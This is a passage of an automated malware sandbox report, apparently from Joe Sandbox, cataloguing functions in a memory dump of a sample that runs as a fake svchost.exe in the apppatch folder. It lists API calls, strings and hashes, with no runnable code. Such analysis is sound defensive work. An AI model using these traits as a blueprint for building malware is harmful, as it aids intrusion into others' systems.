                                                                                                                                                                                                              • Instruction ID: 0c0118ebd8839479322b6e57f3856c32fe558fb06897ed93738b546a24290e58
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ea368782c83eb8d9fb4fe4d63da277147c5c130fe3bb9713448244e84e3ee2fe
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5C91CF72E102158FCB14CF28CC85BAA3BAAEF84351F5445B9ED0A9F345D675A911CBE0
                                                                                                                                                                                                              Function 02CA8220 Relevance: 6.1, APIs: 4, Instructions: 83fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: fwrite$fseek
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3883414211-0
                                                                                                                                                                                                              • Opcode ID: 1eb9b744a3bec3a981fcbffb181d56751ae81504603ca8a360dbd9dba99cb492
                                                                                                                                                                                                              • Instruction ID: 1e90889426b201886007b223bb685302d415cc12faed74636f32484306fa5bb5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1eb9b744a3bec3a981fcbffb181d56751ae81504603ca8a360dbd9dba99cb492
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9021D270A417069FD720CFA8CC41BAEB7F5EF98300F048A6DE485E7381D275AA45CB90
                                                                                                                                                                                                              Function 02CA2370 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA2392
                                                                                                                                                                                                              • GetParent.USER32(?), ref: 02CA239E
                                                                                                                                                                                                              • GetWindowTextW.USER32(00000000,?,00000104), ref: 02CA23B5
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,00000000,?,?,?,?,00000000), ref: 02CA23D6
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ParentTextWindowmemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4175915554-0
                                                                                                                                                                                                              • Opcode ID: be8c2969d54fed72d16183465deb04ba8cae2b08abb5fe0202bf290fb410e227
                                                                                                                                                                                                              • Instruction ID: 9bb035d2271800787b5c20647b192db64973392a5dcdaf7078cdbc1b34251ef0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: be8c2969d54fed72d16183465deb04ba8cae2b08abb5fe0202bf290fb410e227
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4E014573B4032427D7209A68AC88B97F36CAB44149F40433AEE0CE7100EA70DA5486E1
                                                                                                                                                                                                              Function 02C94090 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 40memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000020,00000000,-00000010,?,02C9432B,?), ref: 02C9409C
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,02C9432B,?), ref: 02C940A3
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02C940E2
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocProcess_snprintf
                                                                                                                                                                                                              • String ID: %d.%d.%d.%d
                                                                                                                                                                                                              • API String ID: 1060465051-3491811756
                                                                                                                                                                                                              • Opcode ID: fca309fb0038a16fd477bd28827e570a4c5bdbb9d354676960d5598100967bce
                                                                                                                                                                                                              • Instruction ID: c6df849928c906e67fe7e5b249fb90d10b96f5d74ca8b9bdab66af57990d5bee
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fca309fb0038a16fd477bd28827e570a4c5bdbb9d354676960d5598100967bce
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DEF081B1941720AFD370CF6D9844B67BBE8EF0C651B408A2EF58DC6241D23492148BA0
                                                                                                                                                                                                              Function 02CAB890 Relevance: 6.0, APIs: 4, Instructions: 36threadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • TerminateThread.KERNEL32(00000000,00000000,?,?,02CA8BDE,00000000,02CA0BE3,?,?,?,?,?,?), ref: 02CAB8A0
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CAB740,00000000,00000000,00000000), ref: 02CAB8B5
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,02CA0BE3,00000000,?,?,02CA8BDE,00000000), ref: 02CAB8D3
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,02CA8BDE,00000000), ref: 02CAB8E4
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleThread$CloseCreateInformationTerminate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1825730051-0
                                                                                                                                                                                                              • Opcode ID: a60ec4e2a76ff4cbcafea86ca91ae43a909252ae6c3c4adb233abbbfc7050230
                                                                                                                                                                                                              • Instruction ID: e8c3b218c0c3c5a0029265e661bf9ddf78a6fd82473317099620dde1ee0fe8cb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a60ec4e2a76ff4cbcafea86ca91ae43a909252ae6c3c4adb233abbbfc7050230
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7BF08270A85305FBEB209B69EC1AF5A7BBCAF14B4DF500654F905EA1C0DBB0EA109664
                                                                                                                                                                                                              Function 02CA4170 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000016,75A8EA50,C:\Windows\apppatch\svchost.exe,02CB4A9E), ref: 02CA4181
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02CA4188
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA4198
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • C:\Windows\apppatch\svchost.exe, xrefs: 02CA4176
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocProcessmemset
                                                                                                                                                                                                              • String ID: C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              • API String ID: 2903515874-1712757466
                                                                                                                                                                                                              • Opcode ID: 31314d10895ead05336e49d125fa37ec33b896f9ce4c4acce5116760a3fb9998
                                                                                                                                                                                                              • Instruction ID: 82046bcf3e23e1ab19f8c046a5839454a425e377f06cc583af198189fec95711
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 31314d10895ead05336e49d125fa37ec33b896f9ce4c4acce5116760a3fb9998
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4DE0C277B8251266DA251129AC18B9B26199FC5676F250334FB05E2280DB20D90A42B0
                                                                                                                                                                                                              Function 02CAF840 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 139COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: private$public
                                                                                                                                                                                                              • API String ID: 0-4176808989
                                                                                                                                                                                                              • Opcode ID: f99d891fe6c099c107ac18cd8d48603aefdf55e968627f9b066334fde7561c51
                                                                                                                                                                                                              • Instruction ID: cc425a2c4914f69d0cf04fcacd3293f138b94e96c0f83b5b1783a64e3f0f3fc8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f99d891fe6c099c107ac18cd8d48603aefdf55e968627f9b066334fde7561c51
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6C4147326042074BCB348A7C85753BA7366FFC631CB68469DD88ACBA64F7739A45C780
                                                                                                                                                                                                              Function 02C94100 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CountTick_snprintf
                                                                                                                                                                                                              • String ID: %dd %dh %dm
                                                                                                                                                                                                              • API String ID: 3495410349-3074259717
                                                                                                                                                                                                              • Opcode ID: 962a6d5f4594c64200323ecb6bd0a01ea290a612fecc3106f9a5bb56825ddafc
                                                                                                                                                                                                              • Instruction ID: 8070302137d3b5f62fc66c869502f6af3e678508e7eb9fd1efc6823baa2f4fe9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 962a6d5f4594c64200323ecb6bd0a01ea290a612fecc3106f9a5bb56825ddafc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 77F0EC72B8211517A31CA81DAC0AABA8A9F87C83213CCC63CFD0BCF3D8DCA49C1142C0
                                                                                                                                                                                                              Function 02CAEB00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 9COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02CAE6B0: memset.MSVCRT ref: 02CAE6CF
                                                                                                                                                                                                                • Part of subcall function 02CAE6B0: memset.MSVCRT ref: 02CAE6F1
                                                                                                                                                                                                                • Part of subcall function 02CAE6B0: GetLogicalDriveStringsA.KERNEL32(00000104,?), ref: 02CAE706
                                                                                                                                                                                                                • Part of subcall function 02CAE6B0: SetErrorMode.KERNEL32(00000001), ref: 02CAE71F
                                                                                                                                                                                                                • Part of subcall function 02CAE6B0: GetDriveTypeA.KERNEL32(?), ref: 02CAE768
                                                                                                                                                                                                                • Part of subcall function 02CAE6B0: SetCurrentDirectoryA.KERNEL32(?), ref: 02CAE77B
                                                                                                                                                                                                                • Part of subcall function 02CAE6B0: FindFirstFileA.KERNEL32(?,?), ref: 02CAE7DD
                                                                                                                                                                                                                • Part of subcall function 02CAE6B0: SetErrorMode.KERNEL32(?), ref: 02CAEAF3
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C4149), ref: 02CAEB0B
                                                                                                                                                                                                                • Part of subcall function 02CA39D0: EnterCriticalSection.KERNEL32(02CDFB68,74DF0F00,00000000,74DF2F00), ref: 02CA39E9
                                                                                                                                                                                                                • Part of subcall function 02CA39D0: GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 02CA39FB
                                                                                                                                                                                                                • Part of subcall function 02CA39D0: _snprintf.MSVCRT ref: 02CA3A1B
                                                                                                                                                                                                                • Part of subcall function 02CA39D0: SetCurrentDirectoryA.KERNEL32(?), ref: 02CA3A2B
                                                                                                                                                                                                                • Part of subcall function 02CA39D0: PathAddBackslashA.SHLWAPI(?), ref: 02CA3B00
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CurrentDirectory$BackslashDriveErrorModePathmemset$CriticalEnterFileFindFirstLogicalSectionStringsType_snprintf
                                                                                                                                                                                                              • String ID: A23C4149$COLV
                                                                                                                                                                                                              • API String ID: 2461973751-242836146
                                                                                                                                                                                                              • Opcode ID: cb58072748d613a2147debdbb3ab1aea78d18740b01a21836909f713bed33687
                                                                                                                                                                                                              • Instruction ID: 01eb2ffc196b64a79ac3e4fac4f8ac9bd1f39019c6fb5874e4ee03f1da3be29a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cb58072748d613a2147debdbb3ab1aea78d18740b01a21836909f713bed33687
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 44B09261AC1302627A0437B92C26A296B692C88E57320096A7507508858DA14190EABA
                                                                                                                                                                                                              Function 02CBB0A0 Relevance: 5.1, APIs: 4, Instructions: 65COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • malloc.MSVCRT ref: 02CBB0AE
                                                                                                                                                                                                              • malloc.MSVCRT ref: 02CBB0C3
                                                                                                                                                                                                              • malloc.MSVCRT ref: 02CBB0E9
                                                                                                                                                                                                              • malloc.MSVCRT ref: 02CBB104
                                                                                                                                                                                                                • Part of subcall function 02CBA9D0: free.MSVCRT(?,?,?,75977310,?,02CBCEC2,?,?,?,02CBA2D8), ref: 02CBA9FF
                                                                                                                                                                                                                • Part of subcall function 02CBA9D0: free.MSVCRT(02CBCEC2,?,?,75977310,?,02CBCEC2,?,?,?,02CBA2D8), ref: 02CBAA0F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: malloc$free
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1480856625-0
                                                                                                                                                                                                              • Opcode ID: bb9695770ccdbf418e985ad6d44b813fa89c2a8fac48adc31f180958340809d6
                                                                                                                                                                                                              • Instruction ID: fe911e7c458a4376e3c7c1efbf53b5eca006740fa337db47f6d7dd9be79a8972
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bb9695770ccdbf418e985ad6d44b813fa89c2a8fac48adc31f180958340809d6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4921AFB1A013059FD710CF1AD984A46FBE8FF99310F15C5AAE5888B362D7B1E910CFA0
                                                                                                                                                                                                              Function 02C9EAE0 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000014,00000000,?,?,?,02C9EF5B,00000000,?,?,00000000,Content-Type,?,?,00000000,Referer), ref: 02C9EB1F
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,02C9EF5B,00000000,?,?,00000000,Content-Type,?,?,00000000,Referer,?), ref: 02C9EB26
                                                                                                                                                                                                              • memset.MSVCRT ref: 02C9EB36
                                                                                                                                                                                                              • memcpy.MSVCRT ref: 02C9EB41
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocProcessmemcpymemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 471586229-0
                                                                                                                                                                                                              • Opcode ID: bef12609be7df40c1dfde8b3a2b3ccf79178a119fd0674827aad5532f3321eaf
                                                                                                                                                                                                              • Instruction ID: d7a5589c7ce00ff534e3d427de34f32df7f81e1bfd25d9faea614d1b8b7f6ad4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bef12609be7df40c1dfde8b3a2b3ccf79178a119fd0674827aad5532f3321eaf
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E4012B33601215ABDB20DA699C88F97B7DCAF95761B544702FE05CB184E720EA04C3E4
                                                                                                                                                                                                              Function 02C9F370 Relevance: 5.0, APIs: 4, Instructions: 35memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,00000000,?,02C9FA2B,?,?,?), ref: 02C9F388
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,02C9FA2B,?,?,?), ref: 02C9F38F
                                                                                                                                                                                                              • memset.MSVCRT ref: 02C9F39F
                                                                                                                                                                                                              • memcpy.MSVCRT ref: 02C9F3AA
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocProcessmemcpymemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 471586229-0
                                                                                                                                                                                                              • Opcode ID: 7d0b2efa86cd3a132a794dfcd60d7f2cea592554e7c3f4cd00099edca17616cf
                                                                                                                                                                                                              • Instruction ID: e40713446c0f2a60fc8daddb422eb006f40166a85e5a5f2048d4506331e72091
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7d0b2efa86cd3a132a794dfcd60d7f2cea592554e7c3f4cd00099edca17616cf
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4CF0E533B0261077D6216AA99C48F9B775CEF867A1F504314FF04EB141CA34E91487F4
                                                                                                                                                                                                              Function 02CD4130 Relevance: 5.0, APIs: 4, Instructions: 24memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02CD4145
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02CD4148
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02CD4155
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02CD4158
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$FreeValidate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1670920773-0
                                                                                                                                                                                                              • Opcode ID: f43005ceb54a2a77e049d16cb8e602846fa9cba1a987e9cca02f40ba22bc44e5
                                                                                                                                                                                                              • Instruction ID: 2d01cfbd259d1bf41ab5ea10215fd2e62ba661f5dd1cd590d064a9761fc43b46
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f43005ceb54a2a77e049d16cb8e602846fa9cba1a987e9cca02f40ba22bc44e5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 08E0EC32A4222877D6206AA66C08F8BBB6CEFD5BA2F858511F719E7240C671A41086F0
                                                                                                                                                                                                              Function 02CA41B0 Relevance: 5.0, APIs: 4, Instructions: 18memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,02CA3D17,02C978C7), ref: 02CA41BE
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02CA41C1
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02CA41CE
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02CA41D1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$FreeValidate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1670920773-0
                                                                                                                                                                                                              • Opcode ID: da3ec587be8464722f2b09880df830432fff97ea6b1fc3a7290b14713dc5ae08
                                                                                                                                                                                                              • Instruction ID: 334e52a0877d9e6b795b06408a156464f1e99f25ff7e90a7996c9d21686bad9a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: da3ec587be8464722f2b09880df830432fff97ea6b1fc3a7290b14713dc5ae08
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B7D0C761A8711176D97026766C1CF5F6D5CDFD5B96F854500F615E6044C761D010C5F0